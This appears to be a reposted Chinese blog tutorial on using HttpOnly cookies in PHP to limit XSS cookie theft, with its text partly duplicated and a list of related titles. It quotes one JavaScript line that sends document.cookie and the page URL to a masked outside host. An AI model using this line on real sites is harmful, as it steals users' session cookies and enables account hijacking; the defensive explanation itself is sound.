利用HttpOnly来防御xss攻击
2014-05-18 18:04
489 查看
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
如下js获取cookie信息:
url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 利用HttpOnly来防御xss攻击
- 利用HttpOnly来防御xss攻击
- xss防御之php利用httponly防xss攻击
- xss防御之php利用httponly防xss攻击
- 利用HttpOnly来防御xss攻击
- express中设置cookie的httpOnly属性防御xss攻击
- cookie的httponly的设置(可简单仿XSS攻击)
- 利用Httponly提升web应用程序安全性
- 利用Httponly提升web应用程序安全性
- 利用Httponly提升web应用程序安全性
- 利用HTTP-only Cookie缓解XSS之痛
- httponly对XSS攻击的作用
- 使用Http-only Cookie来防止XSS攻击
- CSRF的防御之HttpOnly
- 利用HTTP-only Cookie缓解XSS
- HttpOnly介绍以及防止XSS攻击时的作用(转)
- 利用Httponly提升web应用程序安全性(转)
- 利用httponly提升应用程序安全性
- 利用httponly提升应用程序安全性[zt]